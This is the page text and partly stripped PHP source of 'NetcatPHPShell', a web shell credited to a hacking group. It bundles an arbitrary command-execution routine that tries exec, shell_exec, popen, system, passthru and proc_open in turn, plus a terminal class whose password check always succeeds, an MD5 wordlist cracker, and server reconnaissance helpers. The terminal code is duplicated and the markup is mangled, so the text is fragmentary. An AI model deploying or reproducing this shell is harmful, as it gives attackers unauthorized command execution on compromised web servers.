Lock is Switched Off! , The shell can be accessed by anyone!



[]======================================[]
[]-----------NetcatPHPShell-------------[]
[]---------------Private----------------[]
[]======================================[]
[]   •(-• c0d3d by Mr.H4rD3n •-)•   []
[]======================================[]
[] NetcatPHPShell Released on 11/04/12  []
[]======================================[]
[]    WeLcOmE Master Of The Server !    []
[]======================================[]
[]           Moroccan Hackers           []
[]            Moroccan C0d3r            []
[]           Moroccan Masters           []
[]======================================[]
[]            MaD In MoRoCcO            []
[]======================================[]
[]                                      []
[]     Netcat PHP Connect to Server     []
[]                                      []
[]======================================[]
[]    My Groupe IsLamiC Warrior Team    []
[]======================================[]
[]    Email: exploit-id@hotmail.com     []
[]  Facebook : Facebook.com/Mr.H4rD3n   []
[]======================================[]

http://img4.imageshack.us/img4/3096/piccat.gif
$mod; $i++) { $size /= $mod; } return round($size, 2) . ' ' . $units[$i]; } function getClientIp() { echo $_SERVER['REMOTE_ADDR']; } function getServerIp() { echo getenv('SERVER_ADDR'); } function getSoftwareInfo() { echo php_uname(); } function diskSpace() { echo HumanReadableFilesize(disk_total_space("/")); } function freeSpace() { echo HumanReadableFilesize(disk_free_space("/")); } function getSafeMode() { global $sm; echo($sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF"); } function getDisabledFunctions() { if(!ini_get('disable_functions')) { echo "None"; } else { echo @ini_get('disable_functions'); } } function getFilePermissions($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } /***********************************************************/ // exec_all , A function used to execute commands , This function will only execute if the Safe Mode is // Turned OfF! /**********************************************************/ function exec_all($command) { $output = ''; if(function_exists('exec')) { exec($command,$output); $output = join("\n",$output); } else if(function_exists('shell_exec')) { $output = shell_exec($command); } else if(function_exists('popen')) { $handle = popen($command , "r"); // Open the command pipe for reading if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { while(!feof($handle)) { $output .= fread($handle, 512); } } else if(function_exists('fgets') && function_exists('feof')) { while(!feof($handle)) { $output .= fgets($handle,512); } } } pclose($handle); } else if(function_exists('system')) { ob_start(); //start output buffering system($command); $output = ob_get_contents(); // Get the ouput ob_end_clean(); // Stop output buffering } else if(function_exists('passthru')) { ob_start(); //start output buffering passthru($command); $output = ob_get_contents(); // Get the ouput ob_end_clean(); // Stop output buffering } else if(function_exists('proc_open')) { $descriptorspec = array( 1 => array("pipe", "w"), // stdout is a pipe that the child will write to ); $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes' if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { while(!feof($pipes[1])) { $output .= fread($pipes[1], 512); } } else if(function_exists('fgets') && function_exists('feof')) { while(!feof($pipes[1])) { $output .= fgets($pipes[1],512); } } } pclose($handle); } else { $output = "They have their Security there! :( "; } return(htmlspecialchars($output)); } function magicQuote($text) { if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function md5Crack($hash , $list) { $fd = fopen($list,"r"); if( strlen($hash) != 32 || $fd == FALSE) { // echo "$hash , " . strlen($hash) ." , $list , $fd"; // Debugging return "

Hash or List invalid!

"; } else { $pwdList = fread($fd,512); $pwdList = explode("\n",$pwdList); echo "Words Checked :-

\n"; foreach($pwdList as $pwd) { $pwd = trim($pwd); echo "
[*] ".$pwd; if(md5($pwd) == $hash ) { return "


\n

Hash Cracked



\n

Planintext : $pwd

"; } } } } //------------------------------------------------------------------------------------------------ ?>

 

'ls -la', 'll' => 'ls -lvhF', 'dir' => 'ls' ); $passwd = array('' => ''); error_reporting(0); class phpTerm { function formatPrompt() { $user=shell_exec("whoami"); $host=explode(".", shell_exec("uname -n")); $_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0]).""; } function checkPassword($passwd) { if(!isset($_SERVER['PHP_AUTH_USER'])|| !isset($_SERVER['PHP_AUTH_PW']) || !isset($passwd[$_SERVER['PHP_AUTH_USER']]) || $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) { @session_start(); return true; } else { @session_start(); return true; } } function initVars() { if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) { $_SESSION['cwd'] = getcwd(); $_SESSION['history'] = array(); $_SESSION['output'] = ''; $_REQUEST['command'] =''; } } function buildCommandHistory() { if(!empty($_REQUEST['command'])) { if(get_magic_quotes_gpc()) { $_REQUEST['command'] = stripslashes($_REQUEST['command']); } // drop old commands from list if exists if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) { unset($_SESSION['history'][$i]); } array_unshift($_SESSION['history'], $_REQUEST['command']); // append commmand */ $_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n"; } } function buildJavaHistory() { // build command history for use in the JavaScript if (empty($_SESSION['history'])) { $_SESSION['js_command_hist'] = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"'; } } function outputHandle($aliases) { if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) { $_SESSION['cwd'] = getcwd(); //dirname(__FILE__); } elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) { // The current command is 'cd', which we have to handle as an internal shell command. // absolute/relative path ?" ($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; // cosmetics while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); while (preg_match('|/\.\.(?!\.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if(empty($new_dir)): $new_dir = "/"; endif; (@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n"; } else { /* The command is not a 'cd' command, so we execute it after * changing the directory and save the output. */ chdir($_SESSION['cwd']); /* Alias expansion. */ $length = strcspn($_REQUEST['command'], " \t"); $token = substr(@$_REQUEST['command'], 0, $length); if (isset($aliases[$token])) $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length); $p = proc_open(@$_REQUEST['command'], array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); /* Read output sent to stdout. */ while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8'); } /* Read output sent to stderr. */ while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } } } // end phpTerm /*########################################################## ## The main thing starts here ## All output ist XHTML ##########################################################*/ $terminal=new phpTerm; @session_start(); $terminal->initVars(); $terminal->buildCommandHistory(); $terminal->buildJavaHistory(); if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif; $terminal->outputHandle($aliases); header('Content-Type: text/html; charset=UTF-8'); echo '' . "\n"; ?> .:: --+ NeTCaTPHPShell +-- ::. nd )'
http://img4.imageshack.us/img4/3096/piccat.gif

-------------------------------------------------------------------------------------

–•(- © Copyright Mr.H4rD3n [ All rights reserved ] -)•–

-------------------------------------------------------------------------------------

Get Commands to Server - Bypass

'ls -la', 'll' => 'ls -lvhF', 'dir' => 'ls' ); $passwd = array('' => ''); error_reporting(1); class phpTerm { function formatPrompt() { $user=shell_exec("whoami"); $host=explode(".", shell_exec("uname -n")); $_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0]).""; } function checkPassword($passwd) { if(!isset($_SERVER['PHP_AUTH_USER'])|| !isset($_SERVER['PHP_AUTH_PW']) || !isset($passwd[$_SERVER['PHP_AUTH_USER']]) || $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) { @session_start(); return true; } else { @session_start(); return true; } } function initVars() { if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) { $_SESSION['cwd'] = getcwd(); $_SESSION['history'] = array(); $_SESSION['output'] = ''; $_REQUEST['command'] =''; } } function buildCommandHistory() { if(!empty($_REQUEST['command'])) { if(get_magic_quotes_gpc()) { $_REQUEST['command'] = stripslashes($_REQUEST['command']); } // drop old commands from list if exists if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) { unset($_SESSION['history'][$i]); } array_unshift($_SESSION['history'], $_REQUEST['command']); // append commmand */ $_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n"; } } function buildJavaHistory() { // build command history for use in the JavaScript if (empty($_SESSION['history'])) { $_SESSION['js_command_hist'] = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"'; } } function outputHandle($aliases) { if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) { $_SESSION['cwd'] = getcwd(); //dirname(__FILE__); } elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) { // The current command is 'cd', which we have to handle as an internal shell command. // absolute/relative path ?" ($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; // cosmetics while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); while (preg_match('|/\.\.(?!\.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if(empty($new_dir)): $new_dir = "/"; endif; (@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n"; } else { /* The command is not a 'cd' command, so we execute it after * changing the directory and save the output. */ chdir($_SESSION['cwd']); /* Alias expansion. */ $length = strcspn($_REQUEST['command'], " \t"); $token = substr(@$_REQUEST['command'], 0, $length); if (isset($aliases[$token])) $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length); $p = proc_open(@$_REQUEST['command'], array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); /* Read output sent to stdout. */ while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8'); } /* Read output sent to stderr. */ while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } } } // end phpTerm /*########################################################## ## The main thing starts here ## All output ist XHTML ##########################################################*/ $terminal=new phpTerm; @session_start(); $terminal->initVars(); $terminal->buildCommandHistory(); $terminal->buildJavaHistory(); if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif; $terminal->outputHandle($aliases); header('Content-Type: text/html; charset=UTF-8'); echo '' . "\n"; /*########################################################## ## safe mode increase ## bloque fonction ##########################################################*/ ?> \-( CMD Command )-/

POwER CoMMaNdE

X

"; ?>

Rows:

*/ ?>
PWD :

"; ?>

Rows:

*/?>
#Commanders - Private By Mr.H4rD3n - IsLamiC Warrior Team



––•(-• © Copyright Mr.H4rD3n [All rights reserved] •-)•––
 My Email | Facebook :)
\m/ Greetz to : Dr-AngeL - X-Line - Ghost.0f.Morocco - xMjahd - 4chrf - KhantastiC - X internet - And yOu ! \m/
"" WE ARE MUSLIMS, WE CAN NOT HARM ANY SITE I HOPE TO USE THIS TOOL ONLY WHAT PLEASE GOD ""